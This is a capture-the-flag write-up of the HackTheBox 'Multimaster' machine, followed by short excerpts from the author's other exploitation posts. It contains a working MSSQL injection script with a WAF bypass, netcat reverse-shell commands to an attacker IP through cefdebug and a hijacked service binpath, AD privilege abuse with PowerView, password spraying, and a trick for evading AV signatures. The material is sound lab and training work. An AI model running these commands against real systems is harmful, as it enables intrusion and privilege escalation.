# HackTheBox - Multimaster ## Foothold Webserver with /api/getColleagues SQL Injection with a WAF Bypass ## User ### Simple Data Exfil http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/ https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/ union injection to exfiltrate data escaped unicode characters -> Bypass the waf enumerate database -> find table Logins with usernames and hashes - crack hashes and save passwords for later #### Cracking the hashes ### Enumerate Domain Users via RID ```bash= #!/bin/bash function get_output { out=$(curl -X POST http://10.10.10.179/api/getColleagues -d "{\"name\":\"${1}\"}" -H "Content-Type: application/json" -s) resp=$(echo $out | cut -d '"' -f18) echo $resp } # TODO more enum scripts # TODO function dump_tables { } # TODO function dump_hashes { } function find_domain { payload="-1' UNION ALL SELECT 1,2,3,4,DEFAULT_DOMAIN(); --" enc_payload=$(python charunicodeescape.py "$payload") get_output $enc_payload } # Enumerates MSSQL Users by ID function find_by_id { for id in {1..300}; do payload="-1' UNION ALL SELECT 1,2,3,4,SUSER_NAME($id); --" enc_payload=$(python charunicodeescape.py "$payload") resp=$(get_output $enc_payload) [ ! -z "$resp" ] && echo ID=$id USER=$resp sleep 2 done } function get_sid { payload="-1' UNION ALL SELECT 1,2,3,4,CONVERT(char(100),SUSER_SID('MEGACORP\Domain Users'),1); --" enc_payload=$(python charunicodeescape.py "$payload") get_output $enc_payload } # Enumerates Domain Users by SID function find_by_sid { sid=$(get_sid | head -c-9) for x in {500..1500}; do v=$(printf "%08x\n" $x | tr a-z A-Z) # print as hex and pad with 8 zeros hex=${v:6:2}${v:4:2}${v:2:2}${v:0:2} # convert to little endian payload="-1' UNION ALL SELECT 1,2,3,4,SUSER_SNAME($sid$hex); --" enc_payload=$(python charunicodeescape.py "$payload") user=$(get_output $enc_payload) [ ! -z "$user" ] && echo ID=$hex USER=$user sleep 2 done } echo "######## MSSQL Domain Enumeration ########" echo "" echo "Domain: "$(find_domain) #find_by_id #get_sid find_by_sid ``` ### Password Spraying bruteforce login via smb with found users and previously cracked passwords login with evil-winrm ## tushikikatomo -> cyork netstat -a to identify ports listening on 127.0.0.1 `ps | Select-String "Code"` VSCode is being run in intervals, we also notice the listening ports are changing and only open when VSCode is running Electron CEFDebugger listening (NodeJS) https://github.com/taviso/cefdebug we can abuse it with this tool called cefdebug ``` cefdebug.exe # identify correct url cefdebug.exe --code "process.mainModule.require('child_process').exec('C:\\windows\\system32\\spool\\drivers\\color\\nc.exe -e cmd.exe 10.10.14.17 1338')" --url ws://127.0.0.1/{<some-uuid>} ``` ## cyork -> sbauer net user cyork -> Member of the Developers Group we can read the C:\inetpub\wwwroot Directory somewhere inside we find MultimasterAPI.dll and MultimasterAPI.pdb easily decompile it with dnSpy or similar tools find credentials for the MSSQL User finder ### Password Spraying (again) another bruteforce attack with this password on all domain users (patator smb_login) we can login as sbauer, also part of Remote Management -> evil-winrm ## sbauer -> jorden run sharphound ``` -> GenericWrite privileges on jorden # Command to Get rid of comments and possible AV Signatures # sed '/<#/,/#>/d' powerview.ps1 > new_powerview.ps1 # Credit: https://implicitdeny.org/2016/03/powerview-caught-by-sep/ -> use PowerView.ps1 to abuse them in the following way: ``` ``` *Evil-WinRM* PS C:\Users\sbauer\Documents> Set-DomainObject -Identity jorden -XOR @{useraccountcontrol=4194304} -Verbose Verbose: [Get-DomainSearcher] search base: LDAP://DC=MEGACORP,DC=LOCAL Verbose: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=jorden)(name=jorden)(displayname=jorden)))) Verbose: [Set-DomainObject] XORing 'useraccountcontrol' with '4194304' for object 'jorden' *Evil-WinRM* PS C:\Users\sbauer\Documents> Get-DomainUser jorden | ConvertFrom-UACValue Name Value ---- ----- NORMAL_ACCOUNT 512 DONT_EXPIRE_PASSWORD 65536 DONT_REQ_PREAUTH 4194304 ``` ## Privesc to System jorden is Member of Server Operator group We have permissions to modify,start & stop some services Find services that are started in the context of LocalSystem reg query HKLM\System\CurrentControlSet\Services /f LocalSystem /t REG_SZ /s pick one and hope for the best ``` *Evil-WinRM* PS C:\Users\jorden\Documents> cmd /c sc config wisvc binpath= "%SystemRoot%\system32\spool\drivers\color\nc.exe -e cmd.exe 10.10.14.17 1338" [SC] ChangeServiceConfig SUCCESS *Evil-WinRM* PS C:\Users\jorden\Documents> cmd /c sc start wiSvc PROFIT!!! [SC] StartService FAILED 1053: The service did not respond to the start or control request in a timely fashion. *Evil-WinRM* PS C:\Users\jorden\Documents> ``` Shell as NT Authority/System gg ###### tags: `CTF` `HTB` `Windows`
Last changed by  
imth
just your friendly neighbourhood hacker Twitter: @imthoe
583

Read more

SROP - Sigreturn Oriented Programming

A few months ago a colleague of mine created a simple buffer overflow challenge to teach others how to defeat ASLR. The program itself was written in assembly and only consisted of 3 syscalls more or less – read, write and exit. The overflow was easy, there was no boundary check or anything and you could simply write data to the stack. Since the purpose of the challenge was to defeat only ASLR, NX was disabled. The intended solution was to leak a stack address via the write syscall, write some shellcode to the stack, calculate the offset with the leaked address and jump to it. When I started working on the challenge it never occurred to me that I could use a write syscall to leak an address. That's when I dug down the rabbit hole. After some researching I stumpled upon a technique that I had not heard of before: SROP. Spoiler Alert, I didn't solve the challenge with SROP because I was only able to read 58 bytes. I'll explain in a moment why that's important. I was intrigued either way and started learning about it. SROP stands for Sigreturn Oriented Programming and unlike Return Oriented Programming only requires 2 Gadgets, the ability to write 300 bytes to the stack and the ability to control the Instruction Pointer. The required gadgets are a sigreturn and a syscall return gadget. In older Linux Kernels these are often already available at a fixed address. A sigreturn is used to return from the signal handler and to clean up the stack frame after a signal has been unblocked. And "cleaning up the stack frame" really means it's restoring important context data that has been saved on the stack temporarily. This data includes values of all registers and some things that are unrelevant for exploitation, which is also the reason why at least 300 bytes are required for it to work. I won't go into detail about the context struct that is used to store this data. The python library pwntools already provides an easy method to forge these structs. This will allow us to control all registers with only a single gadget. Once these requirements are met it's possible to do basically anything. In my exploit I will use mprotect to make a memory segment with a fixed address writable and executable, shift the stack to this address space,write some shellcode on the stack and execute it by returning to it.

10/10/2021
HackTheBox - Intense

Enumeration Nmap: # Nmap 7.80 scan initiated Sat Jul 11 17:54:15 2020 as: nmap -sC -sV -oN nmap 10.10.10.195 Nmap scan report for 10.10.10.195 Host is up (0.043s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey:

4/9/2021
HackTheBox - Console

Googling leads us to this plugin: https://chrome.google.com/webstore/detail/php-console/nfhmhhlpfleoednkpnnnkolmclajemef Looking at the requests and code we can confirm it is using that plugin. The plugin uses multiple sha256 sums of the password for authentication. Source Code: https://github.com/barbushin/php-console We can simply copy the "publickey", it's just a hash of the IP and basic UID. For Simplicity's sake we just copy it. There is a field in the response headers isSuccess telling us if we successfully authenticated or not. I created a bruteforcing script that can be found below.

7/15/2020
Read more from imth
Published on HackMD